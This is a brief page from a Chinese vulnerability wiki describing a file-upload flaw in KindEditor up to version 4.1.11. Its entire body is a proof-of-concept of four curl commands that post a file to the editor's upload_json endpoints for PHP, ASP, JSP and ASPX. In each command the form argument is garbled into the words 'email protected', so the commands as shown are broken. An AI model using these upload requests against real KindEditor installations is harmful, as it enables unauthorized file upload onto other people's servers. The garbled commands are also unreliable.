◆◆0

Kindeditor 上传漏洞

pwnwiki.com

,

漏洞影响

kindeditor <= 4.1.11

POC

curl -F"email protected" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file
curl -F"email protected" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file
curl -F"email protected" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file
curl -F"email protected" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file

免费、自由、人人可编辑的漏洞库--pwnwiki.com

返回顶部